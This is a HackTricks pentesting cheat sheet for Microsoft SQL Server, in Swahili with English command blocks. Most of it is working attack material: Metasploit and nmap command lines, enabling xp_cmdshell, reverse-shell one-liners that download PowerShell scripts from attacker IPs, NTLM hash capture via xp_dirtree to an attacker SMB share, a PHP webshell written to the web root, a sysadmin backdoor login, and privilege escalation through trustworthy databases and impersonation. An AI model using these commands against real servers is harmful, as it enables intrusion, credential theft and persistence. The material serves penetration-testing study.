1433 - Pentesting MSSQL - Microsoft SQL Server

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kikundi cha Usalama cha Kujaribu Kwa Bidii


Taarifa Msingi

Kutoka wikipedia:

Microsoft SQL Server ni mfumo wa usimamizi wa database wa kihusishi uliyoendelezwa na Microsoft. Kama seva ya database, ni bidhaa ya programu yenye kazi kuu ya kuhifadhi na kurejesha data kama inavyotakiwa na programu nyingine—ambazo zinaweza kukimbia kwenye kompyuta ile ile au kwenye kompyuta nyingine kwenye mtandao (ikiwa ni pamoja na Mtandao).\

Bandari ya chaguo: 1433

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

Majedwali ya Mfumo wa MS-SQL ya Ufafanuzi

  • Database ya msingi: Hii ni database muhimu kwani inakamata maelezo yote ya kiwango cha mfumo kwa kipengee cha SQL Server.

  • Database ya msdb: SQL Server Agent hutumia database hii kusimamia ratiba za tahadhari na kazi.

  • Database ya mfano: Inafanya kazi kama kielelezo kwa kila database mpya kwenye kipengee cha SQL Server, ambapo mabadiliko yoyote kama ukubwa, usanidi, mfano wa kupona, na zaidi yanafanana katika databases zilizoundwa hivi karibuni.

  • Database ya Rasilimali: Database isiyoweza kuhaririwa ambayo ina vitu vya mfumo vinavyokuja na SQL Server. Vitu hivi, ingawa vimehifadhiwa kimwili kwenye database ya Rasilimali, kwa mantiki vinaonyeshwa kwenye schema ya sys ya kila database.

  • Database ya tempdb: Inafanya kama eneo la kuhifadhi la muda kwa vitu vya muda au seti za matokeo ya kati.

Uthibitishaji

Uthibitishaji wa Kiotomatiki

Ikiwa hujui chochote kuhusu huduma:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

Ikiwa huna vyeti unaweza kujaribu kuzigundua. Unaweza kutumia nmap au metasploit. Kuwa makini, unaweza kuzuia akaunti ikiwa utashindwa kuingia mara kadhaa ukitumia jina la mtumiaji lililopo.

Metasploit (inahitaji vyeti)

#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Uchunguzi wa Mikono

Kuingia

# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go

Uchambuzi wa Kawaida

# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master

#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

Pata Mtumiaji

pageTypes of MSSQL Users
# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers

Pata Ruhusa

  1. Inalindika: Imetajwa kama rasilimali zinazosimamiwa na SQL Server kwa ajili ya kudhibiti upatikanaji. Hizi hugawanywa katika makundi yafuatayo:

  • Server – Mifano ni pamoja na maktaba za data, kuingia, mwisho wa mawasiliano, vikundi vya upatikanaji, na majukumu ya seva.

  • Database – Mifano hujumuisha jukumu la maktaba ya data, majukumu ya programu, skimu, vyeti, katalogi za maandishi kamili, na watumiaji.

  • Skimu – Inajumuisha meza, maoni, taratibu, kazi, visawe, n.k.

  1. Ruhusa: Zinahusishwa na vitu vinavyolindwa vya SQL Server, ruhusa kama vile ALTER, CONTROL, na CREATE zinaweza kutolewa kwa mkuu. Usimamizi wa ruhusa hufanyika katika viwango viwili:

  • Kiwanja cha Seva kwa kutumia kuingia

  • Kiwanja cha Maktaba ya Data kwa kutumia watumiaji

  1. Mkuu: Istilahi hii inahusu kifaa ambacho kimetolewa ruhusa ya kufikia kitu. Wakuu kwa kawaida ni pamoja na kuingia na watumiaji wa maktaba ya data. Udhibiti wa upatikanaji wa vitu vinavyolindwa hufanywa kwa kutoa au kukataa ruhusa au kwa kuwaingiza kuingia na watumiaji katika majukumu yenye haki za upatikanaji.

# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

Mbinu

Tekeleza Amri za OS

Tafadhali elewa kwamba ili uweze kutekeleza amri, siyo tu ni muhimu kuwa na xp_cmdshell imezimwa, bali pia kuwa na ruhusa ya KUTEKELEZA kwenye utaratibu uliowekwa wa xp_cmdshell. Unaweza kujua ni nani (isipokuwa sysadmins) wanaweza kutumia xp_cmdshell na:

Use master
EXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —

Pora Hashi ya NetNTLM / Shambulio la Kurelayi

Unapaswa kuanzisha seva ya SMB ili kukamata hashi inayotumiwa katika uwakiki (impacket-smbserver au responder kwa mfano).

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

Unaweza kuangalia ni nani (isipokuwa sysadmins) ana ruhusa ya kukimbia hizo kazi za MSSQL kwa:

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';

Kwa kutumia zana kama responder au Inveigh inawezekana kuiba hash ya NetNTLM. Unaweza kuona jinsi ya kutumia zana hizi katika:

pageSpoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Kutumia Viungo Vilivyothibitishwa vya MSSQL

Soma chapisho hili ili kupata maelezo zaidi kuhusu jinsi ya kutumia kipengele hiki:

pageMSSQL AD Abuse

Andika Faili

Kuandika faili kwa kutumia MSSQL, tunahitaji kuwezesha Taratibu za Kiotomatiki za Ole, ambayo inahitaji mamlaka ya msimamizi, na kisha kutekeleza taratibu zilizohifadhiwa ili kuunda faili:

# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE

sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

Soma faili na OPENROWSET

Kwa chaguo-msingi, MSSQL inaruhusu faili kusomwa kwenye faili yoyote kwenye mfumo wa uendeshaji ambao akaunti ina ufikiaji wa kusoma. Tunaweza kutumia swali la SQL lifuatalo:

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

Hata hivyo, chaguo la BULK linahitaji idhini ya ADMINISTER BULK OPERATIONS au idhini ya ADMINISTER DATABASE BULK OPERATIONS.

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';

Kivinjari cha makosa kwa SQLi:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

RCE/Soma faili zinazotekeleza scripts (Python na R)

MSSQL inaweza kuruhusu wewe kutekeleza scripts katika Python na/au R. Msimbo huu utatekelezwa na mtumiaji tofauti kuliko yule anayetumia xp_cmdshell kutekeleza amri.

Mfano wa kujaribu kutekeleza 'R' "Hellow World!" haifanyi kazi:

Mfano wa kutumia python iliyowekwa kufanya vitendo kadhaa:

# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

Soma Usajili

Microsoft SQL Server hutoa taratibu nyingi za kuhifadhi zilizopanuliwa ambazo kuruhusu wewe kuingiliana si tu na mtandao bali pia na mfumo wa faili na hata Usajili wa Windows:

Kawaida

Inayotambua-Instance

sys.xp_regread

sys.xp_instance_regread

sys.xp_regenumvalues

sys.xp_instance_regenumvalues

sys.xp_regenumkeys

sys.xp_instance_regenumkeys

sys.xp_regwrite

sys.xp_instance_regwrite

sys.xp_regdeletevalue

sys.xp_instance_regdeletevalue

sys.xp_regdeletekey

sys.xp_instance_regdeletekey

sys.xp_regaddmultistring

sys.xp_instance_regaddmultistring

sys.xp_regremovemultistring

sys.xp_instance_regremovemultistring

```sql

# Example read registry

EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';

# Example write and then read registry

EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';

EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';

# Example to check who can use these functions

Use master;

EXEC sp_helprotect 'xp_regread';

EXEC sp_helprotect 'xp_regwrite';

```

Kwa mfano zaidi angalia chanzo cha asili.

RCE na MSSQL User Defined Function - SQLHttp

Inawezekana kupakia dll ya .NET ndani ya MSSQL na kazi za desturi. Hata hivyo, hii inahitaji ufikiaji wa dbo hivyo unahitaji uhusiano na database kama sa au jukumu la Msimamizi.

Fuata kiungo hiki kuona mfano.

Njia Nyingine za RCE

Kuna njia nyingine za kupata utekelezaji wa amri, kama vile kuongeza taratibu za kuhifadhiwa zilizoziduliwa, Majumuisho ya CLR, Kazi za SQL Server Agent, na maandishi ya nje.

Ukarabati wa Mamlaka wa MSSQL

Kutoka db_owner hadi sysadmin

Ikiwa mtumiaji wa kawaida anapewa jukumu la db_owner juu ya database iliyo na mmiliki wa admin (kama vile sa) na hiyo database imeboreshwa kama trustworthy, mtumiaji huyo anaweza kutumia mamlaka haya kwa privesc kwa sababu taratibu zilizohifadhiwa zilizoundwa hapo zinaweza kutekelezwa kama mmiliki (admin).

# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')

Unaweza kutumia moduli ya metasploit:

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

Au skripti ya PS:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

Uigizaji wa watumiaji wengine

SQL Server ina idhini maalum, inayoitwa IMPERSONATE, ambayo inaruhusu mtumiaji anayetekeleza kuchukua idhini za mtumiaji mwingine au kuingia mpaka muktadha urejeshwe au kikao kikome.

# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

Ikiwa unaweza kujifanya kuwa mtumiaji, hata kama yeye si sysadmin, unapaswa kuangalia iki mtumiaji ana upatikanaji wa databases au seva zilizounganishwa.

Tafadhali kumbuka kwamba mara tu unapokuwa sysadmin unaweza kujifanya kuwa mwingine yeyote:

-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

Unaweza kutekeleza shambulio hili kwa moduli ya metasploit:

msf> auxiliary/admin/mssql/mssql_escalate_execute_as

au kwa script ya PS:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

Kutumia MSSQL kwa Uthabiti

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

Kuchimba Nywila kutoka kwa Seva za SQL Server Zilizounganishwa

Mshambuliaji anaweza kuchimba nywila za Seva za SQL Zilizounganishwa kutoka kwa Mifano ya SQL na kuzipata kwa maandishi wazi, hivyo kupata nywila za mshambuliaji ambazo zinaweza kutumika kupata msingi mkubwa zaidi kwenye lengo. Script ya kuchimba na kufichua nywila zilizohifadhiwa kwa Seva Zilizounganishwa inaweza kupatikana hapa

Baadhi ya mahitaji na mipangilio lazima ifanywe ili kuch exploit hii ifanye kazi. Kwanza kabisa, lazima uwe na Haki za Msimamizi kwenye mashine, au uwezo wa kusimamia Mipangilio ya Seva ya SQL.

Baada ya kuthibitisha ruhusa zako, unahitaji kusanidi mambo matatu, ambayo ni haya yafuatayo:

  1. Wezesha TCP/IP kwenye mifano ya SQL Server;

  2. Ongeza Parameta ya Kuanza, katika kesi hii, bendera ya kufuatilia itaongezwa, ambayo ni -T7806.

  3. Wezesha uunganisho wa msimamizi wa mbali.

Ili kiotomatiki mipangilio hii, hifadhi hii ina hati zinazohitajika. Mbali na kuwa na hati ya powershell kwa kila hatua ya usanidi, hifadhi pia ina hati kamili ambayo inachanganya hati za usanidi na uchimbaji na ufichuaji wa nywila.

Kwa habari zaidi, tazama viungo vifuatavyo kuhusu shambulio hili: Kufichua Nywila za Seva za Database za MSSQL

Kutatua Matatizo ya Uunganisho wa Msimamizi wa Kujitolea wa Seva ya SQL

Kupandisha Hadhi ya Mamlaka ya Kienyeji

Mtumiaji anayetumia seva ya MSSQL atakuwa amewezesha tokeni ya mamlaka SeImpersonatePrivilege. Huenda utaweza kupanda hadhi hadi Msimamizi kufuata moja ya kurasa hizi 2:

pageRoguePotato, PrintSpoofer, SharpEfsPotato, GodPotatopageJuicyPotato

Shodan

  • port:1433 !HTTP

Marejeleo


Amri za Kiotomatiki za HackTricks

Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go

2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go

3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go




xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Last updated